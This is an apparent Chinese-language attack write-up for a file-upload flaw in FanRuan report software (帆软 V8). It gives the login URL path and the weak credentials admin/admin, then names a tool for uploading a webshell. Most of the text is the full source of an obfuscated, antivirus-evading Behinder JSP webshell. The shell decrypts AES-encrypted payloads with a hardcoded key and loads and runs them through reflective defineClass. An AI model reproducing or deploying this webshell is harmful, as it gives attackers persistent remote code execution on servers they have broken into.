帆软V8文件上传漏洞

遇到的一个帆软V8文件上传漏洞，url得加上/WebReport/ReportServer?op=fs_load&cmd=fs_signin才能正常访问，不然是空白页

弱口令admin/admin 进去之后长这样

启动水滴工具，访问本地43023端口，用这个模块上传冰蝎jsp免杀马

<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*,sun.misc.*,
sun.misc.BASE64Encoder,javax.crypto.spec.SecretKeySpec" %>
<%@ page import="java.io.BufferedReader" %>
<%@ page import="java.io.IOException" %>
<%@ page import="java.lang.reflect.Method" %>
<jsp:scriptlet>
    String pp =\u0022\u0050\u004f\u0053\u0054\u0022;
</jsp:scriptlet>
<%
    class b6 extends \u0042\u0041\u0053\u0045\u0036\u0034\u0044\u0065\u0063\u006f\u0064\u0065\u0072{}
    b6 b6 = new b6();
%>
<%!
    public byte[] gg(byte[] a1,String k) {

        try {
            javax.crypto./*123*/Cipher c = javax.crypto.Cipher.\u0067\u0065\u0074\u0049\u006e\u0073\u0074\u0061\u006e\u0063e("AES/ECB/PKCS5Padding");
            c.init(javax.crypto.Cipher.DECRYPT_MODE, (javax.crypto.spec.SecretKeySpec) Class.forName("javax.crypto.spec.SecretKeySpec").getConstructor(byte[].class, String.class).newInstance(k.getBytes(), "AES"));
            return c.doFinal(a1);

        } catch (Exception e) {
            e.printStackTrace();
            return null;
        }
    }
%>

<%
    if (request.getMethod().equals(pp)) {
        String k = "e45e329feb5d925b";
        session.putValue("u", k);
        BufferedReader reader = request.getReader();
        byte[] a1 = b6.decodeBuffer(reader.readLine());
        byte[] a2 = gg(a1,k);

        Method method2  = Class.forName("java.lang.ClassLoader").getDeclaredMethod("defineClass",byte[].class, int.class, int.class);
        method2.setAccessible(true);
        Class i = (Class) method2.invoke(Thread.currentThread().getContextClassLoader(),a2,0,a2.length);
        Object Qvsa = i.newInstance();
        Qvsa.equals(pageContext);
    }
%>